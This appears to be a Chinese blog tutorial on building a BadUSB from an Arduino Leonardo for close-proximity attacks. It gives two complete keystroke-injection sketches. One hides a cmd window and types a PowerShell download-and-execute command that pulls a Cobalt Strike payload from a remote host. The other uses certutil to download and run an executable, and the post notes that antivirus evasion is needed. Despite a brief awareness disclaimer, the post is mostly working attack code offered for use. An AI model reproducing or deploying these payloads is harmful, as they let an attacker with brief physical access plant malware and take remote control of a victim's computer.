[近源攻击]badusb制作

免责声明:本文用于攻击者攻击方式，用于提高防范意识，切勿用于不法用途

---

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文整理近源攻击制作攻击USB的相关思路

硬件支持

首先你得有跟up一样帅的可编程USB

安装编写工具

https://www.arduino.cc/en/software

 

然后安装好

插USB

先插上USB

然后在工具中选择相应型号的开发板

选择要开发的硬件板

这里的型号要看你买的USB是什么类型的。

我的是上面那个leonardo的。

然后选中这个USB

这里的名字可以在计算机管理页面端口位置查看

你插上多出来哪个就是哪个。

web投提式入侵

CS生成web投递

复制一下网址

然后把下面代码写到里面去

#include<Keyboard.h>

void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口
  delay(200); 
  //=========================Run==========================
  Keyboard.println("cmd");
  delay(500);
  Keyboard.println("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.9:6666/XD'))");
  delay(5000);
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop()
{
}

powershell哪里自行修改为自己的，去除双引号

然后点击

即可上线

木马下载式入侵

代码如下

#include<Keyboard.h>

void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口
  delay(200); 
  //=========================Run==========================
  Keyboard.println("cmd");
  delay(500);
  Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/1.exe c:\\temp\\1.EXE");
  Keyboard.println("cd c:\\temp\\");
  Keyboard.println("1.exe");
  delay(500);
  Keyboard.println("exit");
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop()
{
}

到时候给文件托管，让他下载到指定位置即可。

这种需要文件免杀。

上限高。

注意事项

1.开着vware虚拟机不太行，测试了一下他会提示你连接到虚拟机还是主机，你选择慢了他会提示端口占用

2.后面那个网址你代码中写的DE那么他访问的是de，反之相反。不知道是不是bug

3.每次编译完他都会自行执行一次的